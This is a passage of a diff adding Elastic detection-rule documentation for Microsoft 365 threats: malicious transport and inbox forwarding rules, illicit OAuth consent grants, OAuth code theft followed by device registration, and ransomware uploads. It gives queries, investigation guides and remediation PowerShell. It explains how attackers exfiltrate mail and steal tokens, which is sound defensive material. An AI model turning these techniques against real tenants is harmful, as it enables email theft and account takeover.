transport rules to exfiltrate data. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Transport Rule Creation* + + +Microsoft 365 Exchange transport rules automate email handling, applying actions like forwarding or blocking based on conditions. While beneficial for managing communications, adversaries can exploit these rules to redirect emails externally, facilitating data exfiltration. The detection rule monitors successful creation of new transport rules, flagging potential misuse by identifying specific actions and outcomes in audit logs. + + +*Possible investigation steps* + + +- Review the audit logs for the event.dataset:o365.audit to identify the user account responsible for creating the new transport rule. +- Examine the event.provider:Exchange and event.category:web fields to confirm the context and source of the rule creation. +- Investigate the event.action:"New-TransportRule" to understand the specific conditions and actions defined in the newly created transport rule. +- Check the event.outcome:success to ensure the rule creation was completed successfully and assess if it aligns with expected administrative activities. +- Analyze the transport rule settings to determine if it includes actions that forward emails to external domains, which could indicate potential data exfiltration. +- Correlate the findings with other security events or alerts to identify any patterns or anomalies that might suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when IT staff create or modify transport rules for legitimate purposes. To manage this, establish a baseline of expected rule creation activities and exclude these from alerts. +- Automated systems or third-party applications that integrate with Microsoft 365 might create transport rules as part of their normal operation. Identify these systems and create exceptions for their known actions. +- Changes in organizational policies or email handling procedures can lead to legitimate rule creations. Document these changes and update the monitoring system to recognize them as non-threatening. +- Regular audits or compliance checks might involve creating temporary transport rules. Coordinate with audit teams to schedule these activities and temporarily adjust alert thresholds or exclusions during these periods. 
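+
+To speed up that review, recently changed transport rules and the recipients their actions deliver to can be listed from Exchange Online PowerShell. One possible sketch, assuming the ExchangeOnlineManagement module and appropriate permissions; the look-back window and rule name are placeholders.
+
+[source, powershell]
+----------------------------------
+# Connect to Exchange Online (interactive sign-in).
+Connect-ExchangeOnline
+
+# Surface recently changed rules and any redirect or copy recipients their actions add,
+# so rules that deliver mail to external domains stand out.
+Get-TransportRule |
+    Where-Object { $_.WhenChanged -gt (Get-Date).AddDays(-7) } |
+    Select-Object Name, State, WhenChanged, RedirectMessageTo, BlindCopyTo, CopyTo, AddToRecipients
+
+# Disable a rule pending review if its destination is not an approved domain.
+Disable-TransportRule -Identity "<rule-name>" -Confirm:$true
+----------------------------------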
+ + +*Response and remediation* + + +- Immediately disable the newly created transport rule to prevent further unauthorized email forwarding or data exfiltration. +- Conduct a thorough review of the audit logs to identify any other suspicious transport rules or related activities that may indicate a broader compromise. +- Isolate the affected user accounts or systems associated with the creation of the transport rule to prevent further unauthorized access or actions. +- Reset passwords and enforce multi-factor authentication for the affected accounts to secure access and prevent recurrence. +- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. +- Escalate the incident to the incident response team if there is evidence of a broader compromise or if sensitive data has been exfiltrated. +- Implement enhanced monitoring and alerting for transport rule changes to detect and respond to similar threats more effectively in the future. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:"New-TransportRule" and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc new file mode 100644 index 0000000000..053bd58fcb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification.asciidoc @@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-8-microsoft-365-exchange-transport-rule-modification]] +=== Microsoft 365 Exchange Transport Rule Modification + +Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps +* https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Exfiltration +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Exchange Transport Rule Modification* + + +Microsoft 365 Exchange transport rules manage email flow by setting conditions and actions for messages. Adversaries may exploit these rules to disable or delete them, facilitating data exfiltration or bypassing security measures. The detection rule monitors audit logs for successful execution of commands that alter these rules, signaling potential misuse and enabling timely investigation. + + +*Possible investigation steps* + + +- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the "Remove-TransportRule" or "Disable-TransportRule" actions. +- Identify the user account associated with the event by examining the user information in the audit logs to determine if the action was performed by an authorized individual or a potential adversary. +- Check the event.category:web context to understand if the action was performed through a web interface, which might indicate a compromised account or unauthorized access. +- Investigate the event.outcome:success to ensure that the rule modification was indeed successful and not an attempted action. +- Correlate the timing of the rule modification with other security events or alerts to identify any concurrent suspicious activities that might suggest a broader attack or data exfiltration attempt. +- Assess the impact of the rule modification by reviewing the affected transport rules to determine if they were critical for security or compliance, and evaluate the potential risk to the organization. + + +*False positive analysis* + + +- Routine administrative changes to transport rules by IT staff can trigger alerts. To manage this, maintain a list of authorized personnel and their expected activities, and create exceptions for these users in the monitoring system. +- Scheduled maintenance or updates to transport rules may result in false positives. Document these activities and adjust the monitoring system to temporarily exclude these events during known maintenance windows. +- Automated scripts or third-party tools that manage transport rules might cause alerts. Identify these tools and their typical behavior, then configure the monitoring system to recognize and exclude these benign actions. 
+- Changes made as part of compliance audits or security assessments can be mistaken for malicious activity. Coordinate with audit teams to log these activities separately and adjust the monitoring system to account for these legitimate changes. + + +*Response and remediation* + + +- Immediately disable any compromised accounts identified in the audit logs to prevent further unauthorized modifications to transport rules. +- Revert any unauthorized changes to transport rules by restoring them to their previous configurations using backup data or logs. +- Conduct a thorough review of all transport rules to ensure no additional unauthorized modifications have been made, and confirm that all rules align with organizational security policies. +- Implement additional monitoring on the affected accounts and transport rules to detect any further suspicious activities or attempts to modify rules. +- Escalate the incident to the security operations team for a deeper investigation into potential data exfiltration activities and to assess the scope of the breach. +- Coordinate with legal and compliance teams to determine if any regulatory reporting is required due to potential data exfiltration. +- Enhance security measures by enabling multi-factor authentication (MFA) for all administrative accounts and reviewing access permissions to ensure the principle of least privilege is enforced. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:("Remove-TransportRule" or "Disable-TransportRule") and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc new file mode 100644 index 0000000000..d2dc80ba36 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-microsoft-365-illicit-consent-grant-via-registered-application]] +=== Microsoft 365 Illicit Consent Grant via Registered Application + +Identifies a Microsoft 365 illicit consent grant request on behalf of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources in Microsoft 365 on behalf of the user.
+ +*Rule type*: new_terms + +*Rule indices*: + +* logs-o365.audit-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide +* https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/ +* https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps +* https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access +* Tactic: Credential Access + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft 365 Illicit Consent Grant via Registered Application* + + +Adversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These apps can access sensitive Microsoft 365 data—such as mail, profiles, and files—on behalf of the user once consent is granted. This activity is often initiated through spearphishing campaigns that direct the user to a pre-crafted OAuth consent URL. + +This rule identifies a new consent grant to an application using Microsoft 365 audit logs. Additionally, this is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days. + + +*Possible investigation steps* + + +- **Review the app in Entra ID**: + - Go to **Enterprise Applications** in the Azure portal. + - Search for the `AppId` or name from `o365.audit.ObjectId`. + - Review granted API permissions and whether admin consent was required. + - Check the `Publisher` and `Verified` status. + +- **Assess the user who granted consent**: + - Investigate `o365.audit.UserId` (e.g., `terrance.dejesus@...`) for signs of phishing or account compromise. + - Check if the user was targeted in recent phishing simulations or campaigns. + - Review the user’s sign-in logs for suspicious geolocation, IP, or device changes. + +- **Determine scope and risk**: + - Use the `ConsentContext_IsAdminConsent` and `ConsentContext_OnBehalfOfAll` flags to assess privilege level. + - If `offline_access` or `Mail.Read` was granted, consider potential data exposure. + - Cross-reference affected `Target` objects with known business-critical assets or data owners. + +- **Correlate additional telemetry**: + - Review logs from Defender for Cloud Apps (MCAS), Microsoft Purview, or other DLP tooling for unusual access patterns. + - Search for `AppId` across your tenant to determine how widely it's used. + + +*False positive analysis* + + +- Not all consent grants are malicious. Verify if the app is business-approved, listed in your app catalog, or commonly used by users in that role or department. +- Consent reasons like `WindowsAzureActiveDirectoryIntegratedApp` could relate to integrated services, though these still require verification. 
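+
+If the grant still looks suspicious after these checks, the delegated permissions issued to the client can be reviewed, and later revoked, with Microsoft Graph PowerShell. The following is a minimal sketch, assuming the Microsoft.Graph module is installed and the account can consent to the listed scopes; the AppId and grant ID values are placeholders.
+
+[source, powershell]
+----------------------------------
+# Sign in to Microsoft Graph with scopes that allow reading and revoking delegated grants.
+Connect-MgGraph -Scopes "Application.Read.All", "DelegatedPermissionGrant.ReadWrite.All"
+
+# Resolve the service principal for the suspect application (AppId from the audit event).
+$sp = Get-MgServicePrincipal -Filter "appId eq '00000000-0000-0000-0000-000000000000'"
+
+# List the OAuth2 permission grants issued to that client and the scopes they carry.
+Get-MgOauth2PermissionGrant -Filter "clientId eq '$($sp.Id)'" |
+    Select-Object Id, PrincipalId, ConsentType, Scope
+
+# Revoke a grant confirmed to be illicit.
+Remove-MgOauth2PermissionGrant -OAuth2PermissionGrantId "<grant-id>"
+----------------------------------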
+ + +*Response and remediation* + + +- **If the app is confirmed malicious**: + - Revoke OAuth consent using the https://learn.microsoft.com/en-us/graph/api/oauth2permissiongrant-delete[Microsoft Graph API]. + - Remove any related service principals from Entra ID. + - Block the app via the Conditional Access "Grant" control or Defender for Cloud Apps policies. + - Revoke refresh tokens and require reauthentication for affected users. + - Notify end-users and IT of the potential exposure. + - Activate your phishing or OAuth abuse response playbook. + +- **Prevent future misuse**: + - Enable the https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow[Admin consent workflow] to restrict user-granted consent. + - Audit and reduce overprivileged applications in your environment. + - Consider using Defender for Cloud Apps OAuth app governance. + + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "o365.audit" + and o365.audit.Actor.Type: 5 + and event.action: "Consent to application." + and event.outcome: "success" + and o365.audit.Target.Type: (0 or 2 or 3 or 9 or 10) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc new file mode 100644 index 0000000000..537d32f0b1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-microsoft-365-inbox-forwarding-rule-created]] +=== Microsoft 365 Inbox Forwarding Rule Created + +Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide +* https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Collection +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic +* Gary Blackwell +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Inbox Forwarding Rule Created* + + +Microsoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities. + + +*Possible investigation steps* + + +- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters. +- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address. +- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange. +- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities. +- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise. +- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized. + + +*False positive analysis* + + +- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations. +- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule. 
+- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period. +- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule. +- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior. + + +*Response and remediation* + + +- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules. +- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings. +- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access. +- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure. +- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised. +- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes. +- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
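+
+To baseline inbox-rule activity for the affected mailbox during triage, a broader, hedged variant of the rule query below can be useful. It drops the forwarding-parameter filter so that all rule creations and modifications by the user are returned; the o365.audit.UserId value is a placeholder and assumes that field is populated for Exchange audit records in your environment:
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:Exchange and
+event.category:web and event.action:("New-InboxRule" or "Set-InboxRule") and
+o365.audit.UserId:"jane.doe@example.com"
+
+----------------------------------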
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset:o365.audit and event.provider:Exchange and
+event.category:web and event.action:("New-InboxRule" or "Set-InboxRule") and
+  (
+    o365.audit.Parameters.ForwardTo:* or
+    o365.audit.Parameters.ForwardAsAttachmentTo:* or
+    o365.audit.Parameters.RedirectTo:*
+  )
+  and event.outcome:success
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Collection
+** ID: TA0009
+** Reference URL: https://attack.mitre.org/tactics/TA0009/
+* Technique:
+** Name: Email Collection
+** ID: T1114
+** Reference URL: https://attack.mitre.org/techniques/T1114/
+* Sub-technique:
+** Name: Email Forwarding Rule
+** ID: T1114.003
+** Reference URL: https://attack.mitre.org/techniques/T1114/003/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc
new file mode 100644
index 0000000000..b9a408b7bc
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc
@@ -0,0 +1,133 @@
+[[prebuilt-rule-8-19-8-microsoft-365-oauth-redirect-to-device-registration-for-user-principal]]
+=== Microsoft 365 OAuth Redirect to Device Registration for User Principal
+
+Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* filebeat-*
+* logs-o365.audit-*
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 15m
+
+*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow
+* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/
+
+*Tags*:
+
+* Domain: Cloud
+* Domain: SaaS
+* Data Source: Microsoft 365
+* Data Source: Microsoft 365 Audit Logs
+* Use Case: Identity and Access Audit
+* Tactic: Credential Access
+* Resources: Investigation Guide
+
+*Version*: 2
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Microsoft 365 OAuth Redirect to Device Registration for User Principal*
+
+
+
+*Possible investigation steps*
+
+- Review the two UserLoggedIn logs to confirm that they come from different source.ip values and are associated with the same account.
+- Verify all events associated with the source.ip of the second event in the sequence; a hedged example pivot query is provided after the response guidance below.
+- Investigate the details of the new device that was added by reviewing the o365.audit.ModifiedProperties.Device_DisplayName.NewValue attribute.
+
+- Investigate the user account associated with the successful sign-in to determine if this activity aligns with expected behavior or if it appears suspicious.
+- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access.
+- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user.
+
+
+*False positive analysis*
+
+- Both authentication events in the sequence originate from the same source.ip, suggesting the authorization code was redeemed by the legitimate user rather than an attacker.
+- The user owns multiple devices and legitimately registered a new device shortly after an OAuth authorization code authentication.
+
+
+*Response and remediation*
+
+- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions.
+- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid.
+- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse.
+- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise.
+- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts.
+- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats.
+- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event.
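+
+Before reviewing the rule query below, the sign-in pivot described in the investigation steps can be expressed as a hedged example search. The related.user value is a placeholder for the account named in the alert; review the source.ip, o365.audit.ExtendedProperties.RequestType, and o365.audit.ExtendedProperties.ResultStatusDetail values of the returned events to separate the victim's OAuth2:Authorize redirect from the attacker's OAuth2:Token exchange:
+
+[source, js]
+----------------------------------
+event.dataset: "o365.audit" and event.action: "UserLoggedIn" and related.user: "jane.doe"
+
+----------------------------------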
+ +==== Rule query + + +[source, js] +---------------------------------- +sequence by related.user with maxspan=30m +[authentication where event.action == "UserLoggedIn" and + o365.audit.ExtendedProperties.RequestType == "OAuth2:Authorize" and o365.audit.ExtendedProperties.ResultStatusDetail == "Redirect" and + o365.audit.UserType: ("0", "2", "3", "10")] // victim source.ip +[authentication where event.action == "UserLoggedIn" and + o365.audit.ExtendedProperties.RequestType == "OAuth2:Token" and o365.audit.ExtendedProperties.ResultStatusDetail == "Success"] // attacker source.ip to convert oauth code to token +[web where event.dataset == "o365.audit" and event.action == "Add registered users to device."] // user.name is captured in related.user + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc new file mode 100644 index 0000000000..bc9230fa5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-microsoft-365-potential-ransomware-activity]] +=== Microsoft 365 Potential ransomware activity + +Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. + +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy +* https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Use Case: Configuration Audit +* Tactic: Impact +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Microsoft 365 Potential ransomware activity* + + +Microsoft 365's cloud services can be exploited by adversaries to distribute ransomware by uploading infected files. This detection rule leverages Microsoft Cloud App Security to identify suspicious uploads, focusing on successful events flagged as potential ransomware activity. By monitoring specific event datasets and actions, it helps security analysts pinpoint and mitigate ransomware threats, aligning with MITRE ATT&CK's impact tactics. + + +*Possible investigation steps* + + +- Review the event details in the Microsoft Cloud App Security console to confirm the specific files and user involved in the "Potential ransomware activity" alert. +- Check the event.dataset field for o365.audit logs to gather additional context about the user's recent activities and any other related events. +- Investigate the event.provider field to ensure the alert originated from the SecurityComplianceCenter, confirming the source of the detection. +- Analyze the event.category field to verify that the activity is categorized as web, which may indicate the method of file upload. +- Assess the user's recent activity history and permissions to determine if the upload was intentional or potentially malicious. +- Contact the user to verify the legitimacy of the uploaded files and gather any additional context or explanations for the activity. +- If the files are confirmed or suspected to be malicious, initiate a response plan to contain and remediate any potential ransomware threat, including isolating affected systems and notifying relevant stakeholders. + + +*False positive analysis* + + +- Legitimate file uploads by trusted users may trigger alerts if the files are mistakenly flagged as ransomware. To manage this, create exceptions for specific users or groups who frequently upload large volumes of files. +- Automated backup processes that upload encrypted files to the cloud can be misidentified as ransomware activity. Exclude these processes by identifying and whitelisting the associated service accounts or IP addresses. +- Certain file types or extensions commonly used in business operations might be flagged. Review and adjust the detection rule to exclude these file types if they are consistently identified as false positives. +- Collaborative tools that sync files across devices may cause multiple uploads that appear suspicious. Monitor and exclude these tools by recognizing their typical behavior patterns and adjusting the rule settings accordingly. +- Regularly review and update the list of exceptions to ensure that only verified non-threatening activities are excluded, maintaining the balance between security and operational efficiency. + + +*Response and remediation* + + +- Immediately isolate the affected user account 